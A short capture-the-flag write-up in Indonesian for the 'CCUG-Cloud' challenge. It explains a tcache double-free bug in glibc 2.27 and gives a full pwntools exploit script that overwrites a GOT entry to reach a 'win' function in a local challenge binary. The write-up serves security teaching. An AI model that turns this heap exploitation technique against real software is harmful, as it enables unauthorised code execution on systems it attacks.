# CCUG-Cloud

## Deskripsi

    cloud yg cuma bisa alokasi memory ? hmm..
    ubuntu 18.04

## Solusi

pada glibc `2.27` terdapat bug pada `tcache` dapat dibaca [disini](https://github.com/shellphish/how2heap/blob/master/glibc_2.26/tcache_dup.c)
kita dapat melakukan `double free` secara langsung, seketika itu juga kita dapat melakukan controll
terhadap register `rdi` dan `rdx`, `rdi, QWORD PTR [rdx]` dapat kita manfaatkan untuk melakukan 
GOT overwrite ke function `win`, berikut solver soal ini:

    #!/usr/bin/env python2
    import sys
    from pwn import *
    context.update(arch="amd64", endian="little", os="linux", log_level="info",)
    LOCAL, REMOTE = False, False
    TARGET=os.path.realpath("../release/ccug-cloud")
    elf = ELF(TARGET)

    def attach(r):
        if LOCAL:
            bkps = []
            gdb.attach(r, '\n'.join(["break %s"%(x,) for x in bkps]))
        return

    def exploit(r):
        # attach(r)
        r.sendlineafter("| select [1-3] :","1")
        r.sendlineafter('[?] size :',"10")
        r.sendlineafter('[?] data :',"A"*8)

        r.sendline("2")
        r.sendline("2")

        r.sendlineafter("| select [1-3] :","1")
        r.sendlineafter('[?] size :',"10")
        r.sendlineafter('[?] data :',p64(0x00000602070))

        r.sendlineafter("| select [1-3] :","1")
        r.sendlineafter('[?] size :',"10")
        r.sendlineafter('[?] data :',"A"*8)

        r.sendlineafter("| select [1-3] :","1")
        r.sendlineafter('[?] size :',"10")
        r.sendlineafter('[?] data :',p64(0x00000000004008c7))

        r.interactive()
        return

    if __name__ == "__main__":
        if len(sys.argv)==2 and sys.argv[1]=="remote":
            REMOTE = True
            r = remote("127.0.0.1", 1337)
        else:
            LOCAL = True
            r = process([TARGET,])
        exploit(r)
        sys.exit(0)

